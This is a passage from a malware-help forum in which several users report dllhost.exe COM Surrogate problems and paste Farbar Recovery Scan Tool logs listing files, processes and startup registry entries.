2016-09-15 02:57 - 00329720 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-09-15 01:04 - 2016-09-15 01:04 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat 2016-09-15 01:04 - 2016-09-15 01:04 - 00000000 ____D C:\Program Files\Intel 2016-09-15 01:04 - 2016-09-15 01:04 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin 2016-09-15 01:04 - 2016-05-27 15:50 - 00104584 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.DLL 2016-09-15 01:04 - 2016-05-27 15:50 - 00100488 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL 2016-09-05 13:44 - 2016-09-05 16:46 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-08-31 06:58 - 2016-09-13 02:00 - 00000550 _____ C:\WINDOWS\Tasks\SUPERAntiSpyware Scheduled Task bdd463d5-961f-4895-aa8b-12fed1956349.job 2016-08-31 06:58 - 2016-09-05 16:46 - 00000550 _____ C:\WINDOWS\Tasks\SUPERAntiSpyware Scheduled Task 9c97e707-2f6a-49fa-9c39-bf57a7fce1cb.job ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-09-19 21:11 - 2015-12-10 02:56 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-09-19 18:31 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\rescache 2016-09-19 16:28 - 2016-04-11 17:10 - 00000000 ____D C:\zzmp4 2016-09-19 15:28 - 2016-01-19 15:40 - 00000000 ____D C:\Users\GImagineG\AppData\Local\WORDsearch 11 2016-09-19 15:26 - 2016-01-19 15:40 - 00000000 ____D C:\Program Files (x86)\WORDsearch 11 2016-09-19 15:25 - 2015-12-10 03:29 - 01174306 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-09-19 15:22 - 2015-12-10 03:43 - 00000000 __SHD C:\Users\GImagineG\IntelGraphicsProfiles 2016-09-19 15:20 - 2016-07-16 02:04 - 00262144 _____ C:\WINDOWS\system32\config\BBI 2016-09-19 15:20 - 2016-01-19 15:40 - 00000000 ____D C:\Users\GImagineG\Documents\WORDsearch 2016-09-19 15:20 - 2016-01-19 15:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WORDsearch 11 2016-09-19 15:00 - 2016-05-16 21:27 - 00000000 ____D C:\Users\GImagineG\AppData\Local\Sling_cache 2016-09-19 14:35 - 2016-07-16 07:45 - 00000000 ____D C:\WINDOWS\INF 2016-09-19 14:35 - 2015-12-11 07:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2008 2016-09-19 14:27 - 2016-07-16 07:36 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ___RD C:\Program Files\Windows Defender 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ___HD C:\Program Files\WindowsApps 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\MUI 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\registration 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\SysWOW64\downlevel 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\system32\downlevel 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\system32\Dism 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\servicing 2016-09-19 13:02 - 2016-02-19 09:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Transcender 2016-09-19 13:02 - 2016-01-11 22:35 - 00000000 ____D C:\ProgramData\WORDsearch 2016-09-19 13:02 - 2015-12-15 12:19 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\vlc 2016-09-19 13:02 - 2015-12-10 07:41 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Winamp 2016-09-19 13:01 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\appcompat 2016-09-19 13:01 - 2016-01-11 23:37 - 00000000 ____D C:\ProgramData\Real 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files\Reference Assemblies 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files (x86)\MSBuild 2016-09-16 05:04 - 2015-12-11 07:05 - 00000000 ____D C:\Users\GImagineG\Documents\SQL Server Management Studio 2016-09-15 05:03 - 2016-07-16 07:47 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ___SD C:\WINDOWS\system32\F12 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ___SD C:\WINDOWS\system32\dsc 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\oobe 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\lv-LV 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\lt-LT 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\et-EE 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\es-MX 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\en-GB 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\ShellExperiences 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\Provisioning 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender 2016-09-15 02:26 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-09-15 02:21 - 2015-12-10 03:31 - 00000000 ____D C:\Users\GImagineG\AppData\Local\Packages 2016-09-15 02:04 - 2015-12-10 03:32 - 00002375 _____ C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2016-09-15 02:04 - 2015-12-10 03:32 - 00000000 ___RD C:\Users\GImagineG\OneDrive 2016-09-15 02:03 - 2015-12-10 03:31 - 00000000 __RHD C:\Users\Public\AccountPictures 2016-09-15 01:16 - 2016-07-16 07:47 - 00000000 ____D C:\ProgramData\USOPrivate 2016-09-15 01:15 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2016-09-15 01:15 - 2016-07-16 02:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2016-09-15 01:15 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2016-09-15 01:14 - 2016-07-16 07:47 - 00000000 __RSD C:\WINDOWS\Media 2016-09-15 01:14 - 2016-07-16 07:47 - 00000000 __RHD C:\Users\Public\Libraries 2016-09-15 01:14 - 2015-12-10 01:47 - 00000938 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job 2016-09-15 01:13 - 2016-08-01 13:56 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware 2016-09-15 01:13 - 2016-07-16 07:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2016-09-15 01:13 - 2016-04-21 04:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TinyWall 2016-09-15 01:13 - 2016-03-29 07:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2016-09-15 01:13 - 2016-02-21 11:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools 2016-09-15 01:13 - 2016-01-27 00:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++ 2016-09-15 01:13 - 2016-01-11 23:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RealNetworks 2016-09-15 01:13 - 2015-12-29 19:36 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner 2016-09-15 01:13 - 2015-12-15 14:10 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Yamb 2.1.0.0 beta 2 2016-09-15 01:13 - 2015-12-15 13:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip 2016-09-15 01:13 - 2015-12-15 12:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN 2016-09-15 01:13 - 2015-12-14 16:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008R2 Community & Samples 2016-09-15 01:13 - 2015-12-12 04:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2015 2016-09-15 01:13 - 2015-12-11 08:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Developer Network 2016-09-15 01:13 - 2015-12-11 06:58 - 00000000 ____D C:\WINDOWS\SysWOW64\1033 2016-09-15 01:13 - 2015-12-11 06:58 - 00000000 ____D C:\WINDOWS\system32\1033 2016-09-15 01:13 - 2015-12-11 06:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 2016-09-15 01:13 - 2015-12-10 09:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cool Edit Pro 2.0 2016-09-15 01:13 - 2015-12-10 09:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nero 7 Essentials 2016-09-15 01:13 - 2015-12-10 09:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LightScribe Direct Disc Labeling 2016-09-15 01:13 - 2015-12-10 07:41 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Winamp Detector Plug-in 2016-09-15 01:13 - 2015-12-10 07:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp 2016-09-15 01:13 - 2015-12-10 05:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime 2016-09-15 01:13 - 2015-12-10 02:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-09-15 01:13 - 2015-10-30 02:28 - 00000000 ____D C:\Users\Default.migrated 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\spool 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\Macromed 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\Help 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2016-09-15 01:07 - 2016-01-26 22:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SuperNZB 2016-09-15 01:07 - 2015-12-14 17:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 R2 2016-09-15 01:07 - 2015-12-12 05:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits 2016-09-15 01:07 - 2015-12-12 04:55 - 00000000 ____D C:\Program Files\IIS 2016-09-15 01:07 - 2015-12-11 08:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v6.0A 2016-09-15 01:07 - 2015-12-11 08:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 R2 November CTP 2016-09-15 01:07 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files\MSBuild 2016-09-15 01:07 - 2015-10-30 05:07 - 00000000 ____D C:\WINDOWS\ShellNew 2016-09-15 01:05 - 2016-06-23 23:27 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sling 2016-09-15 01:05 - 2015-12-10 05:48 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Amazon 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\PrintDialog 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\MiracastView 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2016-09-15 00:50 - 2016-07-16 11:17 - 00000000 ___HD C:\$WINDOWS.~BT 2016-09-15 00:12 - 2015-12-10 03:56 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-09-15 00:10 - 2015-12-10 03:56 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-09-15 00:02 - 2015-12-10 01:47 - 00000942 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job 2016-09-14 23:51 - 2016-03-29 07:04 - 00000000 ____D C:\Program Files\Microsoft Silverlight 2016-09-14 23:51 - 2016-03-29 07:04 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2016-09-14 23:38 - 2015-10-30 03:19 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll 2016-09-14 23:38 - 2015-10-30 03:19 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll 2016-09-14 23:31 - 2015-12-12 05:05 - 00000000 ____D C:\Users\GImagineG\Documents\Visual Studio 2015 2016-09-14 23:26 - 2015-12-10 01:47 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-09-13 07:03 - 2015-12-11 07:02 - 00000000 ____D C:\Users\GImagineG\Documents\Visual Studio 2008 2016-09-07 12:32 - 2016-07-16 07:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-09-07 12:32 - 2016-07-16 07:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-09-05 16:46 - 2016-08-01 13:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware 2016-09-05 16:46 - 2016-03-29 06:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service ==================== Files in the root of some directories ======= 2016-03-29 01:23 - 2016-03-29 01:23 - 0000017 _____ () C:\Users\GImagineG\AppData\Local\resmon.resmoncfg ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-09-15 01:03 ==================== End of FRST.txt ============================
  5. Hi there. So, whenever I open skype, I repeatedly get the whole shabang that is dllhost.exe *32" COM Surrogate. It happens all of the time no matter how much I try and deal with it. I've used anti-malware's malwarebyte, restarted my computer multiple times after scanning my entire computer system, and scanned my computer with McAfee. No matter what I do, when I open skype; the whole thing repeats itself. It's gotten to the point that I hardly want to open my skype and bother doing anything about it. Skype is the only thing it effects is what I've noticed, by the way, and I'd truly love it if someone would help me out on how to fix this problem. Please and thank you for taking the time out of your day to help us computer noobs out.
  6. Greetings, Please, please help. Yesterday, I suddenly kept having to reclick the mouse to continue what I was doing: typing, scrolling, etc. I also noticed a brief wait icon next to the cursor at times. I opened task manager and noticed dllhost.exe is constantly stopping and restarting, stopping and restarting. Each time it does this, it re-sets the mouse state; it's also tying up system resources. I've scanned with Malwarebytes and it's finding no threats. I've not experiencing multiple instances of dllhost.exe like so many others, just the one instance constantly restarting and resetting mouse state. I don't know what else it could be doing, but besides that concern, it's nearly impossible to efficiency, or enjoyable conduct business and pleasure on the PC because I'm continually have to re-click whatever I'm in to make it the active window. Seems like malicious code, but I just can't seem to get it fixed. Thank you
  7. I have been getting constant Malwarebytes Anti-Malware pop-ups for last 12 hours about "Process: C:\WINDOWS\SysWOW64\dllhost.exe" I have tried to run scan from Malwarebytes, but it is not identifying any problems.
  8. Ok here is the txt files after the scan. Thank You. Rick. FRST.txt Addition.txt
  9. Hello. Came on forum on October 28th with same issue. dllhost.exe running about 20 instances and eating up memory. Problem seemed fixed on October 28th through this forum, but it must have been buried deep because it is back. Noticed problems with my screen saver, Avira antivirus doing weird things and my wireless adapter flashing crazily. Checked Task Manager and sure enough, the dllhost.exe COM surrogate is replicating and bogging down my computer. I hope that's all it's doing..... Anyway, I ran the FARBAR utility and am attaching the FRST and ADDITION results to see if maybe someone can help get rid of this dang malware once and for all. In the meantime, I'm going to unhook from the internet until tomorrow to see if there's a reply from a moderator in case there's something nasty going on with this malware infection. Thanks, Todd. Addition.txt FRST.txt
  10. I am receiving malicious site blocked fff5ee.com It liste the process as dllhost.exe. I see that you often start with running FRST.exe and having people submit the two attached files. let me know the next steps. Addition.txt FRST.txt
  11. I used the Farbar Recovery scan tool to copy the logs into this dialog they are attached below, Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 26-10-2014 Ran by Office (administrator) on OFFICE-HP on 26-10-2014 16:57:05 Running from C:\Users\Office\Desktop Loaded Profile: Office (Available profiles: Office & LogMeInRemoteUser) Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\WLTRYSVC.EXE (Microsoft Corporation) C:\Windows\System32\wlanext.exe (Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\BCMWLTRY.EXE (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (White Sky, Inc.) C:\Program Files (x86)\Constant Guard Protection Suite\IDVaultSvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe (Palm) C:\Program Files\Palm, Inc\novacomd\amd64\novacomd.exe (PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe (Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\SeagateDashboardService.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\SPAMfighter\sfus.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\FighterSuiteService.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Yahoo! Inc.) C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe (White Sky, Inc.) C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_w32.exe (TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\tv_x64.exe (IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe (Hewlett-Packard ) C:\Program Files\IDT\WDM\Beats64.exe (Broadcom Corporation) C:\Program Files\Broadcom\Broadcom 802.11\WLTRAY.EXE (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe () C:\Windows\vsnpstd3.exe (Citrix Online, a division of Citrix Systems, Inc.) C:\Users\Office\AppData\Local\Citrix\GoToMeeting\1767\g2mstart.exe (Akamai Technologies, Inc.) C:\Users\Office\AppData\Local\Akamai\netsession_win.exe (Google Inc.) C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe (Akamai Technologies, Inc.) C:\Users\Office\AppData\Local\Akamai\netsession_win.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Citrix Online, a division of Citrix Systems, Inc.) C:\Users\Office\AppData\Local\Citrix\GoToMeeting\1767\g2mcomm.exe (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Dropbox, Inc.) C:\Users\Office\AppData\Roaming\Dropbox\bin\Dropbox.exe (JustCloud.com) C:\Program Files (x86)\JustCloud\JustCloud.exe (Citrix Online, a division of Citrix Systems, Inc.) C:\Users\Office\AppData\Local\Citrix\GoToMeeting\1767\g2mlauncher.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe (Cisco Consumer Products LLC) C:\Program Files (x86)\Cisco Systems\Cisco Connect\CCPrt.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\Tray\FightersTray.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\SPAMfighter\sfagent.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Memeo) C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoDashboard.exe (Google Inc.) C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbarUser_32.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (SPAMfighter ApS) C:\Program Files (x86)\Fighters\SPAMfighter\x64\LiveKitLoader64.exe (Axentra Corporation) C:\Program Files (x86)\Seagate\Seagate Dashboard\HipServAgent\HipServAgent.exe (Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Just Develop It) C:\Program Files (x86)\JustCloud\BackupStack.exe (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\HPTouchSmartSyncCalReminderApp.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Monsoon Multimedia Inc.) C:\Program Files (x86)\Belkin\@TV\Common\havasvc.exe (Microsoft Corporation) C:\Windows\System32\VMWindow.exe (Microsoft Corporation) C:\Windows\System32\vpc.exe (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-03-30] (IDT, Inc.) HKLM\...\Run: [beatsOSDApp] => C:\Program Files\IDT\WDM\beats64.exe [37888 2012-03-30] (Hewlett-Packard ) HKLM\...\Run: [broadcom Wireless Manager UI] => C:\Program Files\Broadcom\Broadcom 802.11\WLTRAY.exe [7172096 2011-11-24] (Broadcom Corporation) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [499608 2011-06-16] (Adobe Systems Incorporated) HKLM\...\Run: [HPSYSDRV] => C:\Program Files (x86)\Hewlett-Packard\HP Odometer\HPSYSDRV.EXE [62768 2008-11-20] (Hewlett-Packard) HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2012-06-08] (LogMeIn, Inc.) HKLM\...\Run: [snpstd3] => C:\windows\vsnpstd3.exe [827392 2006-09-19] () HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291096 2011-12-05] (Intel Corporation) HKLM-x32\...\Run: [HP Software Update] => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation) HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [684024 2012-04-04] (PDF Complete Inc) HKLM-x32\...\Run: [CCPrt] => C:\Program Files (x86)\Cisco Systems\Cisco Connect\CCPrt.exe [1267360 2013-05-04] (Cisco Consumer Products LLC) HKLM-x32\...\Run: [bCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM-x32\...\Run: [seagate Dashboard] => C:\Program Files (x86)\Seagate\Seagate Dashboard\MemeoLauncher.exe [79776 2012-10-14] () HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application 